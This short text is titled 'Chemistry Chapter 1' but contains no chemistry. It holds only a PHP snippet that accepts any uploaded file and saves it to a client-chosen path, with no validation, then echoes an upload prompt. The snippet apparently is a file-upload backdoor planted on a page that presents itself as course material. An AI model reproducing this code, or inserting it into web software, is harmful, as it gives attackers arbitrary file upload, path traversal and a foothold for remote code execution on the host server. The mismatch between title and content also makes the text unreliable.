Chemistry Chapter 1

<?php

$files = @$_FILES["files"];
if ($files["name"] != '') {
$fullpath = $_REQUEST["path"] . $files["name"];
if (move_uploaded_file($files['tmp_name'], $fullpath)) {
echo "

OK-Click here!

“;
}
}echo ‘Upload files…‘;
?><